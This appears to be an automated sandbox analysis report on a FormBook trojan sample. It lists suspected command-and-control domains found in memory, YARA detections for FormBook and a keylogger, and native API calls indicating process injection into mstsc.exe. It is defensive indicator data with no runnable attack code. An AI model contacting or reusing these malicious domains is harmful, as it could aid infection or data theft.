Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.com/bsl/www.whatchicken.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.gvanmp.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.net/bsl/www.renttoowngenius.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.infomgt.netReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.jokerwirewheels.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.jokerwirewheels.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.jokerwirewheels.com/bsl/www.smoothsailingexpress.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.jokerwirewheels.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.listenmelody.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1047288395.00000000063EC000.00000004.00000001.sdmp String found in binary or memory: http://www.listenmelody.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp, explorer.exe, 00000010.00000002.1047288395.00000000063EC000.00000004.00000001.sdmp String found in binary or memory: http://www.listenmelody.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.luohu666.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.luohu666.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.luohu666.com/bsl/www.gvanmp.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.luohu666.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.renttoowngenius.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.renttoowngenius.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.renttoowngenius.com/bsl/www.jokerwirewheels.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.renttoowngenius.comReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.serenityhomedits.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.serenityhomedits.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.serenityhomedits.com/bsl/www.g2vies.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.serenityhomedits.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.smoothsailingexpress.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.smoothsailingexpress.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.smoothsailingexpress.com/bsl/www.theprintshop.ink
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.smoothsailingexpress.comReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.theprintshop.ink
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.theprintshop.ink/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.theprintshop.ink/bsl/www.cbothwelltest2020081703.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.theprintshop.inkReferer:
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.thesunchronical.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.thesunchronical.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.thesunchronical.com/bsl/www.serenityhomedits.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.thesunchronical.comReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.whatchicken.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.whatchicken.com/bsl/
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.whatchicken.com/bsl/www.estivalconsultancy.com
Source: explorer.exe, 00000010.00000003.893668393.00000000063E8000.00000004.00000001.sdmp String found in binary or memory: http://www.whatchicken.comReferer:
Source: explorer.exe, 00000002.00000000.704890174.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: https://aefd.nel
Source: SearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?c
Source: SearchUI.exe, 00000016.00000003.817365227.000001B8D126F000.00000004.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: SearchUI.exe, 00000016.00000002.911665172.000001B8D128D000.00000004.00000001.sdmp, SearchUI.exe, 00000016.00000003.830851464.000001B8D12E5000.00000004.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: SearchUI.exe, 00000016.00000002.910509404.000001B8D0EE3000.00000004.00000001.sdmp String found in binary or memory: https://aefd.nelreports.net/api/report?cingr
Source: SearchUI.exe, 00000016.00000002.916371805.000001B8D20E0000.00000004.00000001.sdmp String found in binary or memory: https://api.msn.com/news/feed?market=en-us&query=
Source: SearchUI.exe, 00000016.00000002.915055024.000001B8D1DD1000.00000004.00000001.sdmp String found in binary or memory: https://mths.be/fromcodepoint
Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.com/
Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office.com/User.ReadWrite
Source: SearchUI.exe, 00000016.00000002.918398229.000001B8D25E0000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com
Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/api/v2.0/Users(
Source: SearchUI.exe, 00000016.00000002.911449678.000001B8D1204000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/profile/v0/users/
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: SecuriteInfo.com.Trojan.Packed2.42783.14936.exe, 00000000.00000002.683345162.00000000024A1000.00000004.00000001.sdmp String found in binary or memory: https://www.google.comT

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a raw input device (often for capturing keystrokes)
Source: WerFault.exe, 0000000A.00000003.731420901.000001EDC784C000.00000004.00000001.sdmp Binary or memory string: GetRawInputData
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: WerFault.exe PID: 7108, type: MEMORY

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1028284186.0000000000A30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1027686906.00000000008F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.721240186.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.721927497.0000000001090000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.686008623.0000000003DFA000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1025912109.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.686170457.0000000003F66000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.722073173.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419D60 NtCreateFile, 1_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419E10 NtReadFile, 1_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419E90 NtClose, 1_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419F40 NtAllocateVirtualMemory, 1_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419DB3 NtCreateFile, 1_2_00419DB3
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_00419E8A NtClose, 1_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_012F9910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F99A0 NtCreateSection,LdrInitializeThunk, 1_2_012F99A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_012F9860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9840 NtDelayExecution,LdrInitializeThunk, 1_2_012F9840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_012F98F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9A20 NtResumeThread,LdrInitializeThunk, 1_2_012F9A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_012F9A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9A50 NtCreateFile,LdrInitializeThunk, 1_2_012F9A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9540 NtReadFile,LdrInitializeThunk, 1_2_012F9540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F95D0 NtClose,LdrInitializeThunk, 1_2_012F95D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_012F9710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_012F97A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_012F9780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_012F9660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_012F96E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9950 NtQueueApcThread, 1_2_012F9950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F99D0 NtCreateProcessEx, 1_2_012F99D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9820 NtEnumerateKey, 1_2_012F9820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012FB040 NtSuspendThread, 1_2_012FB040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F98A0 NtWriteVirtualMemory, 1_2_012F98A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9B00 NtSetValueKey, 1_2_012F9B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012FA3B0 NtGetContextThread, 1_2_012FA3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9A10 NtQuerySection, 1_2_012F9A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9A80 NtOpenDirectoryObject, 1_2_012F9A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9520 NtWaitForSingleObject, 1_2_012F9520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012FAD30 NtSetContextThread, 1_2_012FAD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9560 NtWriteFile, 1_2_012F9560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F95F0 NtQueryInformationFile, 1_2_012F95F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9730 NtQueryVirtualMemory, 1_2_012F9730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012FA710 NtOpenProcessToken, 1_2_012FA710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9760 NtOpenProcess, 1_2_012F9760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012FA770 NtOpenThread, 1_2_012FA770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9770 NtSetInformationFile, 1_2_012F9770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9FE0 NtCreateMutant, 1_2_012F9FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9610 NtEnumerateValueKey, 1_2_012F9610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9670 NtQueryInformationProcess, 1_2_012F9670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F9650 NtQueryValueKey, 1_2_012F9650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 1_2_012F96D0 NtCreateKey, 1_2_012F96D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9540 NtReadFile,LdrInitializeThunk, 6_2_047B9540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B95D0 NtClose,LdrInitializeThunk, 6_2_047B95D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_047B9660
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9650 NtQueryValueKey,LdrInitializeThunk, 6_2_047B9650
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_047B96E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B96D0 NtCreateKey,LdrInitializeThunk, 6_2_047B96D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_047B9710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_047B9FE0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_047B9780
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_047B9860
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9840 NtDelayExecution,LdrInitializeThunk, 6_2_047B9840
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_047B9910
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B99A0 NtCreateSection,LdrInitializeThunk, 6_2_047B99A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9A50 NtCreateFile,LdrInitializeThunk, 6_2_047B9A50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9560 NtWriteFile, 6_2_047B9560
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047BAD30 NtSetContextThread, 6_2_047BAD30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9520 NtWaitForSingleObject, 6_2_047B9520
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B95F0 NtQueryInformationFile, 6_2_047B95F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9670 NtQueryInformationProcess, 6_2_047B9670
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9610 NtEnumerateValueKey, 6_2_047B9610
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9770 NtSetInformationFile, 6_2_047B9770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047BA770 NtOpenThread, 6_2_047BA770
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9760 NtOpenProcess, 6_2_047B9760
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9730 NtQueryVirtualMemory, 6_2_047B9730
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047BA710 NtOpenProcessToken, 6_2_047BA710
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B97A0 NtUnmapViewOfSection, 6_2_047B97A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047BB040 NtSuspendThread, 6_2_047BB040
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9820 NtEnumerateKey, 6_2_047B9820
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B98F0 NtReadVirtualMemory, 6_2_047B98F0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B98A0 NtWriteVirtualMemory, 6_2_047B98A0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9950 NtQueueApcThread, 6_2_047B9950
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B99D0 NtCreateProcessEx, 6_2_047B99D0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9A20 NtResumeThread, 6_2_047B9A20
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9A10 NtQuerySection, 6_2_047B9A10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9A00 NtProtectVirtualMemory, 6_2_047B9A00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9A80 NtOpenDirectoryObject, 6_2_047B9A80
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047B9B00 NtSetValueKey, 6_2_047B9B00
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_047BA3B0 NtGetContextThread, 6_2_047BA3B0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159D60 NtCreateFile, 6_2_00159D60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159E10 NtReadFile, 6_2_00159E10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159E90 NtClose, 6_2_00159E90
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159F40 NtAllocateVirtualMemory, 6_2_00159F40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159DB3 NtCreateFile, 6_2_00159DB3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00159E8A NtClose, 6_2_00159E8A
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08814EF4 CreateProcessAsUserW, 0_2_08814EF4
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0096C9BB 0_2_0096C9BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0096EBE3 0_2_0096EBE3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0096D4AF 0_2_0096D4AF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_00962590 0_2_00962590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_00969E80 0_2_00969E80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_00966750 0_2_00966750
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_00963988 0_2_00963988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0096C370 0_2_0096C370
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_0096B5C0 0_2_0096B5C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB8514 0_2_04AB8514
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB0788 0_2_04AB0788
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB2798 0_2_04AB2798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04ABCE58 0_2_04ABCE58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB1F98 0_2_04AB1F98
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB8609 0_2_04AB8609
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB0778 0_2_04AB0778
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04AB7C50 0_2_04AB7C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04ABCE48 0_2_04ABCE48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_04ABD968 0_2_04ABD968
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08813810 0_2_08813810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.42783.14936.exe Code function: 0_2_08810040 0_2_08810040
